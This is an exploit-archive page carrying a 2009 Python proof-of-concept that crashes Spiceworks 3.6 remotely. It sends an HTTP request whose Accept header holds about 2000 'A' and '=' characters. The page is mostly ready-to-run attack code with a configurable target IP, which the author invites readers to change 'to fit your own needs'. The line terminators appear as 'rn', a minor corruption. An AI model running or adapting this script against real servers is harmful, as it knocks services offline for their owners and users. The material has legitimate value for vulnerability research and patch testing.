[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Spiceworks 3.6 Accept Parameter Overflow Crash Exploit
# Published : 2009-08-07
# Author : David Kennedy (ReL1K)
# Previous Title : FoxPlayer 1.1.0 (m3u File) Local Buffer Overflow PoC
# Next Title : FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit
#!/usr/bin/python
# Spiceworks 3.6 Accept Parameter Overflow
# Remote Crash P.O.C.
# Written by: SecureState R&D
# Author: David Kennedy (ReL1K)
# Tested on Windows 2003 SP2 R2
#
# Vendor Notified on: 05/11/2009
# Vendor Fix: Fixed in version 4.0
#
# esi 000334E0 ASCII "AAAAAAAAAAAAAAAAAA"
# edi 000334E0 ASCII "AAAAAAAAAAAAAAAAAA"
#
import socket
crash="A" * 1000
crash+="=" * 1001 # = signs cause the crash
buffer="GET /login HTTP/1.1rn"
buffer+="Host: 10.211.55.136:9000rn" # change IP + port to fit your own needs.
buffer+="User-Agent: Ohn0esIhascrashrn"
buffer+="Accept: " + crash # <---- vulnerable field here
buffer+="rnrn"
exploit = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
# Enter your own IP below
exploit.connect(("10.211.55.136", 80)) # change IP + port to fit your own needs.
print "[-] SpiceWorks 3.6 Remote Crash [-]"
print "[-] Written by: SecureState R&D [-]"
print "[-] Author: David Kennedy (ReL1K) [-]"
print "[-] Triggering overflow... [-]"
exploit.send(buffer)
exploit.close()
# www.Syue.com [2009-08-07]